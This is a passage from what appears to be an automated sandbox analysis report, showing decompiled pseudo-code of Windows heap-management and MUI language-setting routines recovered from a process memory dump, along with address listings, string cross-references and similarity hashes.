						} else {
							_t352 = E0101174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E01007D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E010A14FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E00FE9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E00FE9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x10d8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E00FEB150();
											} else {
												E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E00FEB150();
											_pop(_t491);
											__eflags =  *0x10d7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E010A2073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E010AA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0100A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E01007D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E01007D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E010A1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E01007D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E01007D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x10d8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E00FEB150();
							} else {
								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E00FEB150();
							__eflags =  *0x10d7bc8;
							if( *0x10d7bc8 == 0) {
								__eflags = 0;
								E010A2073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x10d8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E00FEB150();
												} else {
													E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E00FEB150();
												__eflags =  *0x10d7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E010A2073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E010AA80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E0100A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0100B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0100A830(_t553, _v64, _v24);
								_t286 = E01007D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E01007D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E010A1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E01007D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E01007D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E010A1411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0101174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0100B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E01007D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E010A14FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E010099BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0100A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0101ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}

0x0100a309
0x0100a316
0x0100a319
0x0100a31d
0x0100a32d
0x0100a331
0x01051e0d
0x01051e10
0x0100a3cb
0x0100a3cb
0x0100a3bd
0x0100a3c3
0x0100a3c3
0x0100a33a
0x01051e17
0x01051e1b
0x01051e1d
0x01051e2f
0x01051e34
0x01051e36
0x01051e3c
0x01051e3c
0x01051e3c
0x01051e3c
0x01051e36
0x01051e42
0x01051e45
0x01051e47
0x0100a3f8
0x0100a3f8
0x0100a3fb
0x0100a3fd
0x01051e50
0x0100a403
0x0100a411
0x0100a411
0x0100a411
0x0100a41e
0x0100a420
0x0100a424
0x0100a427
0x0100a7c9
0x0100a7cd
0x0100a7d2
0x0100a7d9
0x0100a7e0
0x0100a7e3
0x0100a7ed
0x0100a7f3
0x0100a7f9
0x0100a7ff
0x0100a802
0x0100a807
0x0100a809
0x0100a809
0x0100a809
0x0100a80f
0x0100a80f
0x0100a812
0x0100a81c
0x0100a821
0x0100a824
0x0100a42d
0x0100a42d
0x0100a42d
0x0100a42d
0x0100a42d
0x0100a436
0x0100a43a
0x0100a609
0x0100a60d
0x0100a612
0x0100a616
0x0100a61a
0x01051e57
0x01051e59
0x00000000
0x00000000
0x01051e5f
0x0100a620
0x0100a627
0x01051e64
0x01051e66
0x01051e6c
0x01051e72
0x01051e76
0x01051e95
0x01051e9a
0x01051e78
0x01051e8d
0x01051e92
0x01051ea0
0x01051ea5
0x01051eaa
0x01051eb2
0x01051eb6
0x01051eb9
0x01051eb9
0x01051ebe
0x01051ec2
0x01051ec2
0x01051e66
0x0100a62d
0x0100a633
0x0100a636
0x0100a63a
0x0100a63c
0x0100a640
0x0100a642
0x0100a644
0x0100a644
0x0100a644
0x0100a64d
0x0100a64d
0x0100a651
0x0100a655
0x01051eca
0x01051ed1
0x00000000
0x00000000
0x01051ed7
0x00000000
0x0100a65b
0x0100a669
0x0100a66e
0x0100a670
0x00000000
0x00000000
0x0100a676
0x0100a67b
0x0100a680
0x0100a682
0x01051f1a
0x0100a688
0x0100a688
0x0100a688
0x0100a68a
0x0100a68d
0x01051f24
0x01051f2a
0x01051f31
0x01051f43
0x01051f43
0x01051f31
0x0100a693
0x0100a697
0x0100a69d
0x0100a6a0
0x0100a6a6
0x0100a6a8
0x0100a6a8
0x0100a6a8
0x0100a6a8
0x0100a6b2
0x0100a6b7
0x0100a6c1
0x0100a6c6
0x0100a6d2
0x0100a6d9
0x0100a6e3
0x0100a6e6
0x0100a6eb
0x0100a6ed
0x0100a6ed
0x0100a6ed
0x0100a6ed
0x0100a6f3
0x0100a6f8
0x0100a702
0x0100a70a
0x0100a70e
0x0100a71a
0x0100a71e
0x01051fcb
0x01051fcf
0x01051fdd
0x01051fe3
0x01051fe3
0x0100a724
0x0100a728
0x0100a72a
0x0100a72d
0x0100a737
0x0100a73a
0x0100a73c
0x0100a742
0x0100a748
0x01051f4d
0x01051f50
0x01051f56
0x01051f5c
0x01051f5f
0x01051f7e
0x01051f83
0x01051f61
0x01051f76
0x01051f7b
0x01051f89
0x01051f8e
0x01051f93
0x01051f94
0x01051f9a
0x01051f9c
0x01051f9e
0x01051fa1
0x01051fa1
0x01051fa6
0x01051fa6
0x01051f50
0x0100a74e
0x0100a751
0x0100a754
0x0100a75d
0x0100a75e
0x0100a762
0x0100a767
0x01051faf
0x01051fb0
0x01051fb9
0x01051fbe
0x01051fc2
0x01051fc2
0x0100a76d
0x0100a76d
0x0100a775
0x0100a778
0x0100a77d
0x0100a77d
0x0100a71e
0x0100a782
0x0100a787
0x0100a789
0x01051ff3
0x0100a78f
0x0100a78f
0x0100a78f
0x0100a791
0x0100a794
0x01051ffd
0x01052006
0x0105200c
0x01052017
0x01052019
0x01052024
0x01052024
0x01052024
0x01052047
0x01052047
0x0105200c
0x0100a79a
0x0100a79f
0x0100a7a4
0x0100a7a9
0x0100a7ab
0x0105205a
0x0100a7b1
0x0100a7b1
0x0100a7b1
0x0100a7b3
0x0100a7b6
0x00000000
0x0100a7bc
0x01052066
0x01052068
0x01052073
0x01052073
0x01052073
0x01052078
0x01052079
0x0105207d
0x00000000
0x0105207d
0x0100a7b6
0x0100a440
0x0100a440
0x0100a440
0x0100a446
0x0100a44c
0x0100a44f
0x0100a453
0x0100a455
0x010520b3
0x010520b9
0x010520b9
0x0100a45d
0x0100a460
0x0100a464
0x0100a466
0x0100a46b
0x0100a46f
0x0100a471
0x0100a471
0x0100a471
0x0100a474
0x0100a479
0x0100a47d
0x0100a47f
0x01052229
0x0105222f
0x0100a3c8
0x0100a3c8
0x0100a3ca
0x0100a3ca
0x00000000
0x0100a3ca
0x01052235
0x0105223a
0x0105223a
0x00000000
0x00000000
0x01052240
0x01052246
0x0105224a
0x01052269
0x0105226e
0x0105224c
0x01052261
0x01052266
0x01052274
0x01052279
0x0105227e
0x01052286
0x01052288
0x0105228d
0x0105228d
0x01052292
0x01052292
0x01052295
0x01052295
0x00000000
0x01052295
0x0100a485
0x0100a489
0x0100a48b
0x0100a48f
0x0100a493
0x0100a497
0x0100a49b
0x0100a4bb
0x0100a4bb
0x0100a4bd
0x0100a4ff
0x0100a4ff
0x0100a501
0x0100a505
0x0100a50f
0x0100a517
0x0100a51b
0x0100a527
0x0100a52b
0x01052182
0x01052185
0x01052193
0x01052199
0x01052199
0x0100a531
0x0100a535
0x0100a538
0x0100a548
0x0100a54b
0x0100a54d
0x0100a553
0x0100a559
0x01052100
0x01052103
0x01052109
0x0105210f
0x01052112
0x01052131
0x01052136
0x01052114
0x01052129
0x0105212e
0x0105213c
0x01052141
0x01052147
0x0105214d
0x01052151
0x01052154
0x01052154
0x01052159
0x01052159
0x01052103
0x0100a55f
0x0100a562
0x0100a565
0x0100a567
0x01052162
0x0100a56d
0x0100a574
0x0100a575
0x0100a579
0x0100a57e
0x01052169
0x0105216a
0x01052170
0x01052175
0x01052179
0x01052179
0x0100a57e
0x0100a584
0x0100a58f
0x0100a58f
0x0100a52b
0x0100a5ad
0x0100a5bc
0x0100a5c1
0x0100a5c6
0x0100a5cb
0x0100a5cd
0x010521a9
0x0100a5d3
0x0100a5d3
0x0100a5d3
0x0100a5d5
0x0100a5d8
0x010521b3
0x010521bc
0x010521c2
0x010521cd
0x010521cf
0x010521da
0x010521da
0x010521da
0x010521f7
0x010521f7
0x010521c2
0x0100a5de
0x0100a5e3
0x0100a5e8
0x0100a5ea
0x0105220a
0x0100a5f0
0x0100a5f0
0x0100a5f0
0x0100a5f2
0x0100a5f5
0x01052219
0x0105221b
0x0105208c
0x0105208c
0x0105208c
0x01052095
0x01052096
0x01052097
0x01052098
0x010520a4
0x010520a5
0x010520a9
0x010520a9
0x00000000
0x0100a5f5
0x0100a4bf
0x0100a4d3
0x0100a4d8
0x0100a4da
0x01051ede
0x01051ede
0x01051ee4
0x01051ee9
0x00000000
0x00000000
0x01051f07
0x00000000
0x01051f07
0x0100a4e0
0x0100a4e5
0x0100a4e7
0x010520cb
0x0100a4ed
0x0100a4ed
0x0100a4ed
0x0100a4f2
0x0100a4f5
0x010520d5
0x010520de
0x010520e4
0x010520f6
0x010520f6
0x010520e4
0x0100a4fb
0x00000000
0x0100a4fb
0x0100a4a1
0x0100a4a4
0x0100a4a8
0x00000000
0x00000000
0x0100a4aa
0x0100a4ac
0x00000000
0x00000000
0x0100a4b2
0x0100a4b5
0x00000000
0x00000000
0x00000000
0x0100a4b5
0x0100a43a
0x0100a340
0x0100a346
0x0100a600
0x00000000
0x0100a600
0x0100a34f
0x0100a351
0x0100a358
0x0100a3c6
0x00000000
0x0100a371
0x0100a37a
0x0100a37f
0x0100a382
0x0100a384
0x0100a394
0x00000000
0x0100a396
0x0100a399
0x0100a3a7
0x0100a3b0
0x0100a3b4
0x0100a3bb
0x0100a3d2
0x0100a3da
0x0100a3df
0x0100a3e1
0x0100a3e5
0x0100a3ea
0x0100a3f0
0x0100a3f0
0x0100a3e1
0x00000000
0x0100a3bb
0x0100a394

Strings

(!TrailingUCR), xrefs: 01052274
HEAP[%wZ]: , xrefs: 01051E88, 01051F71, 01052124, 0105225C
((LONG)FreeEntry->Size > 1), xrefs: 01051F89
HEAP: , xrefs: 01051E95, 01051F7E, 01052131, 01052269
(UCRBlock != NULL), xrefs: 01051EA0
(LONG)FreeEntry->Size > 1, xrefs: 0105213C

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 2fe3cbf98e67a43410bc6a4a1d3375cf174b4917c49c18e2e290722654e3b578
Instruction ID: 3961d6edc390ee1472abf33ecfb71f8745202dcadf7d6d20a3221a57b112289f
Opcode Fuzzy Hash: 2fe3cbf98e67a43410bc6a4a1d3375cf174b4917c49c18e2e290722654e3b578
Instruction Fuzzy Hash: CB42BF31608741DFE756CB28C884B6BBBE5BF84714F04896DF9C68B292D734D941CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00FF3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00FF3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00FF1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00FF1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00FF1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00FF1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00FF1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01004620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0102F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01031370(_t276, 0xfc4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0102BB40(0,  &_v68, _t170);
									if(L00FF43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0102BB40(_t257,  &_v68, _t243);
								if(L00FF43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01031370(_t278, 0xfc4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01004620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0102F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01031370(_v16, 0xfc4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0102BB40(_t262,  &_v68, _t244);
								if(L00FF43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01031370(_t282, 0xfc4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0102BB40(_t262,  &_v68, _t201);
							if(L00FF43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01004620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0102F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01031370(_t280, 0xfc4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0102BB40(_t267,  &_v68, _t245);
							if(L00FF43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01031370(_t284, 0xfc4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0102BB40(_t267,  &_v68, _t224);
						if(L00FF43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x00ff3d3c
0x00ff3d42
0x00ff3d44
0x00ff3d46
0x00ff3d49
0x00ff3d4c
0x00ff3d4f
